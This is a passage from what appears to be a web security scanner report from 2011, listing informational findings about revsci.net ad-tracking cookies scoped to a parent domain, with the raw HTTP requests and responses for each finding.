Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:51:16 GMT
Content-Length: 759

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['E05510_10390','D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsi
...[SNIP]...
5.94. http://pix04.revsci.net/E05510/b3/0/3/1003161/564853216.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/564853216.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/564853216.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252F%253F_rsiL%253D0%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBb3IQV+XT5RxDq2qIWAxW81lJ0QSlgYlQhAfV/yUINBw3cQgYrocUZKyvzimWAsuUtPsj5mWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSVFlz/vsh0oin7o3Bbz1tXhw1TpqAvMZ1v1Lv8NerqkTDVdntzlNMPA0y2boUy5Y7voYnl6yfgInYUDcW6SaAKQc8fmEXLMWnPd1UywCVDviQnU8+ot7CCucwAMHnPzp0i/Sn5tB+7puon3vUHjOAOCGmRh9dHzU6fIwRQmdiEhTO8yKU9t1bIy34gP5vFQ9MLGxzzqrLdQWtCrzaEs=; rtc_D3oY=MLsv7iUucA5nprADwxMUR9Sz0MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBepPr9SkW1eU9LpSn2tzgwRP0c/xx5jIRX7BMLqY4BgQC03lxOEmvvtSk5ET4IMDzv8yWjLYK7pDAruXWuMrqWQYCGy8NcEmqwJlS1r3QCTBMPKlGt8h8jhoskQYAEg5VB6abCKt0ty7d4V0r5LMiHjJ1yDDxjo3fWHFdlT0J3x3vNTBOP3u4LdR/ixLPJ4yHO+zAfzaP4HygF1suDMBuT4oX+Q3ErH7vVwhv5PsadCEykM5nhDDFNysSgXBEG+twoDa14AcpRzAbhEsFenqXNxpvSYpqc3Iy2NCgIfu7mw81csoIeKwTlkp9olnajK1wOkRn/RbFuU1Ma+eqf2bJ54C9QYGm/4BYb5mYPHUYbSUBiWvzEkXm4bqgQDP0t5t9xesus2w==; udm_0=MLv39SMJaSprpj6pbNkWOy/KQOJxPslkZwvSPcJbG2twwjyHCTcas2RpUa4WGBFvOb0pRtkHUlxsrSNtdETPkq36I/Y42AJDYid0lsh7axCOZzovkqpJZV2BFcL+fh5qubFWzYKJsapdJwmGdxMp5kZ2HRZuDh58AXR7DmKcoQRFldkApkJPC/e3v068qA9uii5PGoYde11HPBz8B6cjAO4VOUxDMYKpvQXW5aAhisKkKByp27xPuv6bjr0KKy/x/CcRwSpXviIz1OcezWsLCl5Ccp+VXWXyLGRbYG5j8CCadBulYAzPIIfabJm37qdA7kI5utzW72tehbMmqlOEgGT2x29KlKQm9qsocIMphShQSdjZ5KcQPrcWx+AgtpuRmbB/Tpoc6SMZxpQSWO7qMiEa9HBFGY620H+cxte0IcTnIgroAysHHS/30/F+XhasUyvMOyDr9zcWvPP/XgCm3R/v9nFKTI56Kl0rLMj+HmqbcAVEfS0IHgw2komvP0BCChCgLPw/y0h2UmQ/kRq8sCPVqjC6+A85pR0VGGmP7xDD9YSNv1xh9bxtAygc2SORF+es8YToNAl13ygc8zP1aPHg8s8h/XkBDmsBr6a92kkHm6QhwDGl0oFoxcjl8C+m7atiR9Fh4hefm4aBNxg4m0fOrcIXHluYbcqA7GNHQgEmAXDSKTKHtFbElK3Q/W+ZjI8aR5P4Lb8mZvtpc+Kx7N2oPsjFIjI0HspUdj0VYpVkLSR4b66YgfQrlr/cm7ZqG8uV8LwSNOx08abapPsQH/T1Uh3TiGiX73qP04E3mJdvnrpDYqhqehgHA+RPEu+Q9eaHBI4Gh9HciLJum+BUBRe3NoPfT9ZAbvazB8OPSQFC5LZmUjat7EmlF/oTYi2XpNz82zF91rv7lAOdyM+Jqhn+yTK0b52kQSyoy8Lr0apgP1ZJ28rZqHWJi5V6JbrLpFaE8BcHCNkvm6XFRs9YSIjYIokpwyQaXigdCoU/WchOnkIGV1sCvnF76a47S1zzRguw9xzip2wS0Hy/KkEBUcRJfTR7T/C9OEkbpJ07WzzmwOBDjF6Q/m5cB5KNJkGQXn8mDN6RpO005OeyOjDOOtBoVUVEQSd5hI3Y7NrRV02IrvC0a4ErsErV7oENx+ygUWHbQdl8XgiB/A==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_D3oY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDq2qIWKwAWFhJ0QSlgYlQhEc6MiO0UzrToS2ouz039v0EpRxSyNYjyDwk4WWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSVFlz/vsh0oin7o3Bbz1tXhw1TpqAvMZ1v1LPz1IKkcXv2UrwJMsSYTHHxBRWi5YvzbcS9nL86GEH1HVUbSK9jxJkdPngRGXOQPJ78QiRHBGDc2xz/D7O1XypqPR5QrEg54+vdWh0xj7X+jcjAI01pb2NtgjS5kOkLormF5qVWIduaEB5r0Y6geawA4cy/ikUSi8Oxv3ubgSjFKpaE8=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:06 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GQSa=MLsv8SMucB5j5hAH0vmC/252VHiLIgT9sbGvQkQvgrafLIBiBEREiMw9JMHYtmWAML6kTuNHWEhy9hojbdls+dquwaa5GuMToA3eQeIOKZU4EPLYIyw/1PF5b3337mlJR4MFicB6+ZhO4eo2hIosgeRPF1VsnEwSW73nLGe8/i9Fx925s2s5IqolwaPstmdeLowJqlIYdQ2l5XhdhHdkaxQvMw0eLcHsQ1mVT8azUmBbvyo/Cw6yNsQc4SsNfFGkesd1eUewEe1KFcSACCYGCX7PqHiCqh6JpcY3Xecg42q2j0Nb3H+oR/930ZfKST54xVszS/4aMJzKqAH0raB0p9t9kyBANRK56/5sDFV5v3gPUuIQrv12o3AZh2JKsvhbcS8oB8bsiS3iFlBeBhFQMXVeMoS1C1NjSBDpUHXi0ILIPeIjTtrWUgq4W2ZgGPlrvKgYwRx04vWr7RqamvgBSsOZkiq3KItyJkA6gszT33rHfwJ1wsam6ahy12FPJRWnA15T5vdg4Z+riVZhzvuy; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:06 GMT; Path=/
Set-Cookie: NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Mon, 09-May-2011 16:21:06 GMT; Path=/
Set-Cookie: udm_0=MLv39SEJaSpn5l6pbNmEREzM5uAjEsBEzbqEBjKmOxigTwd3Jm/a81YhltY+GVTu54epWIHf3oi1YHPA5mRwJx+S5OA5wGpaU0FxNh20YQtqh7Jq46CjZzQOFzCA8aAByesBIAo00ISe+IVY7dIttA9A1pUGtLzZvCq3rXYChFFM0EXVYn1yRIHsw+s26EULmYA+EJOI7usAQ4PBo8hAKkvGzcFf6yFm4bhp5HlJwp+VSMTAzVtJgs16rbvZrbe7tUhKQqNyOcYuQOqESdHut0B/ClCVDZCGXHOgIpVeIXtztSycQLXe96R9/60MnY37g+F1eUb/v5AWeOJRAuAnvQCMgD2184azB/nLV9WvLKejguSkLSbXU0yZucIW5OEml4SWirEbHJQdr6E1KE8C4a+G1zWIaVH5iMSStdvaDgtE6ABR5j4uKOeGqffUGGv4jqiQgvkM9e1MFlsKqaLrLL783v1NVUjWjfzKG0T+BzCVr2HOmSwB3zXkdf9T643emWebLyeqb0g5fzErRQsc6Lojq2OxPLeauqHp9R4InEpl3vHud/H028UIculVcu7w0tBAkiPQkWvm4znX/x5QDAvXao+/cOfYlLnyVPZ+xGn0p3XTuO7oZmNoycqmpl1kwcITNey1oqVjJ7Cbg8fb+vOnh/Lued5F8G0VwRax/JeiZO5rSGzq9652jszBbmtL/h2Qgx++/bskGIgpYah0cnXakbrgraRxhFGDlSD/KbwaykFORMUQXDMgwvYcGAmOgIxMBPDqJFv693TuQcaNIK4osGfBrJqXrMbJEA3Z1dffqXxel6JUzhxqqjo8AVQmcz9ssb39BMTM65KV0hYFKC1qsrGxNKLgey5/Y24UHxQ+whlmS9HRzXN2toTV0z6XhaGd59vEoRlS9FwKqtZkAM4BlZxK2+Hew1ZY4q33KvEc9VFeBv2LeNliwAususjX+uGjmYorIi3dKfK/QBEobV7JjYz/7/1fCYnvMYcvrWONJKyXuqEZHelVnwMAXGi41ixsNQLrgJWriZG4vU7ACeoFPpPPVv/l3eMYLH2C7Ls69bgdvHFuObun+lmUppDcCbCTWIC20x0x1xV2RsLfwBkI5crenJ0m457tDrtkpFhuwnLc6r+NqKJdVkHrVP5b/37Kfzp/cvVBgP395HfdNa6OVM2wsJUhm3kaBIK5TEXB65o3b/oYn2kip4t6; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:06 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:05 GMT
Content-Length: 699

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-
...[SNIP]...
5.95. http://pix04.revsci.net/E05510/b3/0/3/1003161/695826942.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/695826942.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/695826942.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBbwIMV594t637UNESU50e19nKCDeVRxV0JGXV/y20UzrToS2ouxUK6pw26DrqGgVo5lmMLobyX/hYsFy7h6ka2YtGHF7L0J0A7uDKsLBjQfyzmVKgBYCKKxTZuxZHFHYDKym3y4THvjzrfDIjpx+umtAA3ia4qkYzAj22SLzyuxCuNtcFwlSKLDfLgmRJ9q0bwCUxpoXaK5SamlWkchI9rOYtaQfXz96Js1WGlAShjXEmKfWRz0RaTx9vSg8rrp7Rm/aFCh47XrvgWQJup/wWLvcZH4pN+V5FIEyUA/v2Bt2WsXcaDfcDKCoe3QErwNOYxQdEag==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; rtc_yftK=MLsv8SNKcR5j5rKvi7rucZQk1qHgb/GNFtDD/WY8x18gmPS3yvdKBMFYSwStZcq2W35AfEghHnyiDCgEwe27pElUg8X8v8NZiYvvDQcHb2EcrzzYA+V3Rp3X4RdajVqjGfhZPpd//XrD4QnzuZutrhO5pfLINzYq6lNczX+1sNRXpJYKn/SO9Y2LCojamRji3HwN0umAD+C/kuzJSdyB1bzd1oBKC6uI8jhxiEJLyEl96cgjclheS3iWyvf92irFP3KCNXFb5VjqcBTZUFs9ORmuQqUR7P4GyHoh19L5Ri3q+yBrJYnaUMzG+BQZA0+p26Xp7UaGh2pzCVLJhJkdUu0PsG/ve25uLkrNMvHYscmFTutIg9JbCzY6TWp69oUR4AlKVs7J2DCxCRuWSkkayVVHMk1/dV4vmfGSHG4Bgr1PZKfIy8IXYHHYLfNLx3Z6g+gW1yepRK+07nyTrczsVQ1JLZtkslpVjAL5Ai/jdTgLoSM4I7Zq3qxEyeb3UVIVMyM6n8doRcZpCrd5mYLnDQB4sps=; rsiPus_0="MLtHr1MusT9zJTGzTnzvq4n0ZMEy4vDR9Gb6q+MIh06yeOdpf0mEy8XThTfozoGYWtU3MfVnJY6ibFhL0ESkwKOEwwzbepiyOZ6ZH3pwt2GNiI57SaMBMBu6Sg+rOnIwrBpaU4wyTZvSHoD62ipRALgIYFAurZnoXzKTFQBzwv5t6RrF8K+/p21OC2jpphALAwt26Nn0ZehEs2HpKt1D5KzAZ1jkzG9eJGaULQslNtoEwBEPdj4SxuChuXlZvY20v+Qxs0hloXYxr2dDXV+fmEAkM0Xg4OCGwzN2ingsZP/egH5EpjxR"; rsi_us_1000000="pUP1JU2j/wMU1Y1iQBIXfzyX0DTLJ/7T0vSxbMJk4N1qqrMeRjve4HnZBXtN2co0X00La1ka3oL/1ThMiPc4WRkxTlwyCT3N3Z6BbCtTzRsj3kvAaSSODVmEEyUXLgJSRJWOAa6PjIe7erHQz84ro4C1a2bje8F2an/Pa1BVDUqRBmOXmuSzeu0GTqegMqsel63xBa3ISuvYJuE3YNLmO66G1jNGWXGAsI2SoSPEc/vT53l1rg2bwMgqso8vbxDnPDVc2E2fD5OQh1IvjQWnWXTRsowjnUA4fCNUmmwzKmHtoLri7Kp4wvG0WEz0zXzTDY/gIFrdusNpFtE15ktd2dwpKNsehxDEdj40feZEptBfqjoERvCZNLNYkjHWHgS8qDztRcU/1F/o65w0tBbd1pizHEIZMG+cN/YBQtFdarQhjKJS38I176v1PUG/JiZ3E3rCn4EA0cpdL+PpUbXnpyPlW4DL/TnYoZQVmCIQSg7udIwiCVXkl8+49rMfFpkxOm2FhIQcYJYDxWj8Kq6L29DhfoPSHY0Lhol9JSv8iEVSl4vscMevnDrRD1QlJfl20pmeu1wwl1kX2oNNaThJq9LmPK+EQh5rt9JMjsTao66FjZPgC5weE10TEE+YgLBynIcvCEYLnIiwm0FdccWqGzXXXUFMDsoAlcvf3D6LM2TgiZ4GD1ktQvsfj8ISO/a9gk4E0yyRyA=="; udm_0=MLvv9SMJaSpn557EdtKGREzM5uAkEsBEbZaaSamC1ltg80jsQpPrRW9xUPO7gbf50ex879sHUlxsDSMSyT40d3g9KBDbsUvidic08XBBQHFpSyLGI5hDuOC+N0tdFOaeJa6Io42FsYztne2DyngaUns789MACDCGUIu11dgC3DX1bT0q7kGCESC9qd6gQZWcGOqTn6wCLrFZSsOsx1U3VyX6AUfzLq59t1osdjMkgr9oJAz+GlqViD1Yr53Li8V+cOkhx0n/v7sFXCx9I2XIChqeBIIkhNyVbnOnrwVnGGXS/rGV42RP9F9/y5CozKiUpBJsMPsorf+K4d7Lh/qgU8mROnC0E6UCLH0lL+9k6sb/9Hds9aGWi3yuwB3QyDmYq+XdG1vt3U4XOglK59Trf0M7SBLodLkTDd3onRp9Pv5GOLBppvfATthLTk5+JdWGkY93Q79Y6qo7qrQTQUmwOxDFNsHDF+YuTtL2H0hIwbUkm1U9W2FXruUHCCe5nB9O/JM3Vixi5pGsKpQ3cBQA3/ESHdt2BFW1V0bWorucedsLmmtkRseBiCsvTymhUBGNDbvZNFJ0owNCuU0S9C97z951WlTLREpHfgVvB+jIs45SZQnF1gPeMyfOlFlQ9R1HSf1+QHW1g20w1M2ck6AeyROb+zf5yBaBhgGEUqTrE7ZZ32hLHflgjGrdjdL5rgxvC5vOo3f7uC8SlCRz+zRhYp/Wr3epsU2tUICaK+g0oHWLUFkFggvnwUmTZ5+cn5jAVQC2MfozHq1iU+pV+qQjEQAL8JkY3V6ZCpejOFyLibGapi2c0yCa9KESNSSlLHL3fuVqvwf7CwTDDdOH03whID1XJ7HwDCCnceXv909Z6e04bEa2NSizHfsjEri/wxcXli39NSMiH3c5el6NL/xSMd7Wq+MOYDch3j/v127OCTPmUlEN6hYcqiPTHOldGgtSSqc5jBAlJsv30eQCAj8otRGjPlbbh4x32VUimjN4XY4T6dC/th0AxXicEAdLeaXqZy3mFe7HgL2N9JSUTcMG4RLTgJ4X7PKYpA07eRfRkj3wtxajbHJq+rTtHNv+YR66iKZlgzmtUkW76Sv7pWqYkbs5tvXm1HObNNuNbEbOHvRkMwLZTenj8V8Ymo0qnQHOG3s1yVgYks/JF0gh7rG5F2g1v2If9fqUIAGmZoRnnPG7qdLu72XehnOhgo8tvcKfVA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_yftK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X52BOqEAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKGAI79hIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmS59xVuCAf4vueiYFNo9S72YpjYVEQ02rXdEHf5wlv+bSTNA6SWGQkpXPkeVMyYiNWPYHAe4Sbo5xtcg7NhepYVZNtESS2YwzmHnEqcLi9afckAgiSlty43k/VIylR3orMCyVm/ydJj2xt43XF4gHS2Ma7Phd6W8DNhcci4KdRaug+fsZf4pNBY66H3QSZ3I3F+yd8Cvi2BwwEMpzFrvbntG16zBEew==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:41:15 GMT; Path=/
Set-Cookie: rtc_naNh=MLsv8SVKcR5n5bLrq5gACIHaNi9NrDEErILtKT6KaMjh9FvAc/FYAEbD1AFIKRnVK8Nn0XgnoG4pxoPjUZVkiOaoo9MSkxfH8UtTjXb8JspCpaCBt+pXOUV+TqfJZVi7m6lzqvCfVC1N4cRJhKoNgcxZglSP2A+b4Z3nLGdE/q9Gp8/sA+3FxZYr2PuqFmHcWUZpNNKYgpEcdYJg268e6XxvmClfh5miu6Tr9CQ6ZOsRKvERBLkWPhhnB5Eg/I3ueNCqe7ZlY/FIejkmqyA5qs0rDMa6QuyedVUcyGn4YNedOOE42PwWnqTsWu/2AU/jgvSLM1RShGnwYhixAF3Y3G8TZ6fiDYOhuQPtQsLHL/EcuAf8MKQ/uDN+4AvnXLaglfPQjeP8QbfoZwGChOp5OFp/THda2UYpirwONMkGDD+oTfaBdgJXpGHsR/+TAnm4Bj/7gtvpcaY2ohWuGCTBMVZ5Ch2WNJz777mPJO9S4RjtFKZNQPpBe0NllM17Vwt9AY2k3kxsqAUWtn/3KrPfclNZsoY=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:41:15 GMT; Path=/
Set-Cookie: NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192b&0&&4da27787&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Mon, 09-May-2011 16:41:15 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:41:14 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
5.96. http://pix04.revsci.net/E05510/b3/0/3/1003161/737002840.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/737002840.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/737002840.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=pUP1JU2jPhIc1A0uGehL84pPUbKzTkRplHTtDOLcFLL20Wt/xDozbuB9JMvwkAev2DUhq9kHuGUbrEuN8ON6TNG555znQzlM/5y3Of8x/X6dKg3FnSBBN+UlVxRdchaBGHVUKje4s8VkZQWjQ1gqgAwl+iH3n81oscO5chIWRZ36CXmDSa/OTIUw7CjGsrVH7jcNbZz1+P/5Cwum4IaWC0xqWyJ6XovDln8WaROkuTy33TUAHU61RJV5ivuxthgGJTnsGP2oim8WLMsNpJJA/LXcSgIXz4hNBUU9JAy7BvTu431M47rwgvXF1wwSs8CTVlcKnpNC+IZG/etg7wJ7v5WMpOoewDSPyl+D+ZITHQGpdDrmlVCTSuWtoRAk/fynI6itvIlfPCsB7ygRb9E+JbXqiTTZnEwFnkfcUSLpfgXJjDpEUtIjl0JADwIgGt00osG49t9IyNgiq4ztSgib+W2H7G4irTT7YqeFrKAKXiduq88e4SYI3XCR7PRqRGDSkcK7fP5pU4c4mWtpSGRpuZ/jQr+avXtESVqxm1F2x/dItR5K0ra7JZEPKK5ZdfMXYyC37FPztdunoZPk7PtuCqchU5n4be66l78i37EYOhAfDWUVKTiBXLEGa8OBYj5hoUrVcM75uopbp1ssdiEnTeE0OoyiUytxJOyUR0ZlVeXCl6VK+3+b7NaC+BUqdz1dLv+wtaIRVKaV4LStSk/n; rtc_TdTG=MLsv8yNKcQ5npbJrVs6vNkhIY6HjafGNqOTc1tAMxx8g2PSvwsElcsz7aCnYMEcFNWuyY0i34UZIUNjkLRgI9LkPCbfeH+KZCLxbrVb0tyqLkPb8grbjELIzOkhM53hlyrO5D+rL+JnaL3Hgz4n/P6OIeeLVXqjCnekSd+pnyoVrDjtw9TBr8CCVq4T37CwxL2fr9HC5Xyzve+JV52sLe5TX8Fq441fmYhKVTwiwXgDbgCpHT8aXQ5IlJz8y8fgLe4eNS6Fl53mI7GKBW+UlaUFSBuQbZhtcO3D2OBEnfLRmqWHt0EKaTNhYxr2/rohU9ox3fR+oZzRh5qRrNtPznHi15vGfiD2UUSPtQ2m9GBRVzh3VMLAzWpfHW1PVV8Y3VCYwGDyD8cYBXAEJ3Vd5rOHHwhBgfvfAAmitYuz1Iize51YbT9xVYpZfTNN+C8RpPYOW70eMODRYGng1A6swXECmgJNSt2kT2e0zp8sp4SIIim0M1qMchTiNAj+6qVH3UHnC6UtfizKH6aGCntAnR++9hA==; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X52BOqEAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKGAI79hIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmS59xVuCAf4vueiYFNo9S72YpjYVEQ02rXdEHf5wlv+bSTNA6SWGQkpXPkeVMyYiNWDYjvLUPrW3poFL9bofizkV7I6ynO1TtYsgOwEMnIgbNsHH6nCwM0Kxbt46lR3orMFmVm/ydpkuxt43XF4gHS2Ma7Phd6W8DNhcci4KdRaug+fsZf4pNBQ6pH3QSZ3I3F+yd8CtC1RwwEMpzFrvbntG1S7ZEbg==; 